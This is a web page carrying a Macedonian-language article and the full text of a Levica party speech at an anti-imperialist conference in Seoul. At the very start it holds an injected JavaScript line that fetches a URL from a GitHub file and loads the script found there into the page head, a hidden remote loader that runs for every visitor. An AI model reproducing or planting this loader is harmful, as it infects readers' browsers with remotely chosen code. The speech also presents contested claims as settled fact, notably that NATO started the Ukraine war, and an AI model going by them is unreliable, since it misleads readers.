;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Левица од Сеул: Работниците ќе го победат империјализмот - Антропол
АктуелноЛокалноСтав

Левица од Сеул: Работниците ќе го победат империјализмот

Оваа недела, на 15-ти мај, во главниот град на Јужна Кореја – Сеул, беше одржана Конференцијата на Светската анти-империјалистичка платформа. Политичката партија Левица на конференцијата беше претставена со говорот на координаторот на Секторот за надворешна политика Александар Симонов.

Конференцијата беше насловена „Еден фронт, две бојни полиња“ на која главна тема беше односот на империјалистичките сили кон конфликтот во Украина, како и за спречување на разгорувањето на нови конфликти на Далечниот Исток – за градење на слободен и братски однос помеѓу народите ослободен од империјалистичко влијание.

На конференцијата на која учествуваа политички партии од вкупно 23 земји, Левица ги изнесе своите ставови засновани на сопствените анти-империјалистички платформски начела по однос на економскиот, политичкиот и воеинот имперјализам кој се наметнува и можноста за факторизирање на долгорочната стабилност. На главниот настан му претходеше и протестен марш во Гвангжу, на кој присуствуваа и учесниците кои беа присутни на конференцијата. Во прилог ви го пренесуваме целосниот текст од говорот со кој беше претставена партијата:

Епохата на модерниот капитализам ни потврди дека меѓунадродните односи се оформуваат меѓу капиталистичките сојузи, врз основа на економската поделба на светот од една страна и односи меѓу политичките унии и држави мотивирани од борба за колонии, територијална поделба, пазарни зони од друга страна. Така, стадиумот на капитализам развиен од колективниот Запад, пред сè од страна на САД, доведе до целосна економска поделба на светот, која се карактеризира со хегемонија и диктатура на западните транснационални корпорации, кои теженеат кон управување во секоја сфера, од корпарации кои профитираат преку  воено-индустриски конгломерати и нафтени и гасни корпорации до корпарации кои профитот го остваруваат како ИТ гиганти или фармацевтски (здравствени) профитери . 

Непрекинатото функционирање на диктатурата на капиталот би било невозможно без воена доминација над обичниот човек и работникот, кој во нормални услови природно не би се согласил да биде роб на феудалните и лукративни интереси на западниот капитал. Ваквата доминација на Заподот несомнено се овозможува преку алијансата на НАТО, која способствува (располага) со моќ непрекинато да ги потиснува суверенитетите на одделни земји и прибегнува кон примена на сила и оружје кога политиките не се согласно замислената траекторија. Истовремено, постојано се формирани зони на контролирани конфликти во латентна фаза, најчесто внатредржавни, кои во секој миг можат да бидат подгреани преку постоечките „малцинства“ и  предизвикаат поделба, чија пракса покажа можност за поставување на владетелски мариони, кои верно коленичат на туѓ олтар.

По распадот на Советската држава завладеа диктатурата на капиталот. Беше создаден монополарен военодоминирачки свет што овозможи западните корпарации непречено  да доминираат во управувањето со светската економска моќ. Тие се стекнаа со капацитет да одлучат каде ќе создадат „жешки точки“ и како ќе ги претопуваат властите во државите во свои слуги во било која од земјите.  Во 2014 година, прозападна група олигарси ја презеде власта во Украина, конечно претворајќи ја украинската држава во марионета, пред се на американската олигархија. Украина, по примерот на некои земји од претходно, стана одбранбена линија на американскиот империјализам во Источна Европа.

Избувнувањето на непријателствата во Украина го заокружи периодот на подготовка за отворената борба на американскиот империјализам за зачувување на неговата хегемонија и светскиот поредок. На сето ова претходеше жестока мобилизација на западните земји, сите како еден почнаа да ја пумпаат украинската армија со оружје, да снабдуваат разузнавачки информации, регрутираат платеници, и секако најопасното, формирање на вооружени структури под знамето на фашистичката идеологија. Задачите на овие империјалистички потфати се диктирани од желбата за одржување на хегемонијата, каде во прв ред се интересите на американските корпорации и останатите субјекти кои припаѓаат на структурниот англосаксонски систем на „глобализираната економија“, кои, по распадот на СССР, ги рашири пипките низ целиот свет. 

Состојбата со политичките режими во земјите партнери на западниот империјализам  покажува колку лесно американската демократија на терен се претвора во национализам и дека многу малку е потребно навидум демократската поддрша да се претвори во поддршка која отворено прокламира фашистички идеи и банди, чија работа секогаш е во исклучителен интерес за западните корпорации. Нема сомнение дека сегашната војна во Украина е иницирана од НАТО и пред сè од САД, исто така како што претходно  беше во Виетнам, Југославија, Судан, Либија, Авганистан, Ирак, или пак Сирија. Сето ова по налог на најагресивниите одреди на бизнис класата. 

Тензиите кои се создаваат на истокот, во Јужна Кореја и особено Тајван, со одликуваат речиси со еднакви карактеристики на оние од Украина. Од пред постувувањето на марионетската власт, до конечното вооружување и купување на време за реализација на истото преку Минските договори.

Сведочиме на кулминација од жестока политичка реторика, зад која стојат проширувања на воените буџети, капацитети и бази, и доставка на огромни количини на оружје од страна на САД, токму околу источните земји чии власти се во нивно партнерство. Ако во Украина сведочиме на отворена крвава војна, на истокот имаме ситуација што слободно може да се оцени како ладна војна, а  „фронтот“ го отворија САД против НР Кина.

За жал, како што ладната војна во Украина е преточена во крвав конфликт помеѓу империјалистичките амбиции од една страна и народот кој ја сака својата слобода од друга страна, така оваа заострена реторика и вооружување укажуваат на опасноста ладната војна на Истокот за миг да се претвори во вооружен судир, за чиј исход веројатно ќе мора повторно да пресуди работничката класа.

Обединувањето на работничката класа денес е потребно повеќе од било кога, затоа што таа го претставува стожерот и авангардата која со сопствена и искрена идеја поседува моќ да се спротистави и превенира било каков излив на воени акции, за кои наговестува спремност агресивниот империјализам.

Претходно многупати беше демонстрирано непостоење на никаков закон или договор, почитување на човечки живот, етика или морал, во било кој од империјалистичките „зафати“. Пример е Либија која се претворена во опустошена земја, Сирија исто така. И додека умислено се прави сето ова, империјализмот тргува со човечката несреќа, каде се експлоатира последниот атом енергија на работникот, за да се зграби последната честица богатство кое го оставила природата на овие места.

Западниот империјализам и НАТО отвроија војна на евопско тло, отвроена е и ладната војна со НР Кина, додека сериозно се подгреваат односите околу Тајван и Јужна Кореја. Работничката класа е свесна дека доминацијата на овој империјализам мора да биде завршена! Идејата за создавање на мултиполарен свет засега се наметнува како разумна солуција! Поддршката на пролетеријатот кон анти-имперјалистичката идеја за создавање на мултиполарен свет е неопходна! Нам не ни останува ништо друго освен искрена борба за поправеден свет и чесна прераспределба на добрата кои треба да му служат на работниот народ. Еднаш победивме, Повторно ќе победиме!